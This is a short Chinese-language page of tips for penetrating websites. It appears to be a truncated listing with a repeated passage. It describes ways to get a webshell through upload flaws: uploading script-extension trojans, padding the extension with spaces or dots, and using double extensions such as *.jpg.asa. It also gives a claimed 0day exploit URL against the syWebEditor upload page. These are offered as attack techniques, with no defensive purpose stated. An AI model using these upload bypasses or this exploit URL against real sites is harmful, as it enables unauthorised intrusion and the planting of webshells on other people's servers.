入侵渗透中用到的一些技巧和思路
上传漏洞拿shell:
1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell.
2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:.asp ,.asp..。
3.利用双重扩展名上传例如:*.jpg.asa......
入侵渗透中用到的一些技巧和思路
上传漏洞拿shell:
1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell.
2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:.asp ,.asp..。
3.利用双重扩展名上传例如:*.jpg.asa......
syWebEditor编辑器最新0day
exp:http://www.xxx.com/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7Cjpg%7Cpng%
7C&filePathType=1&filePath=/PhotoFile/P......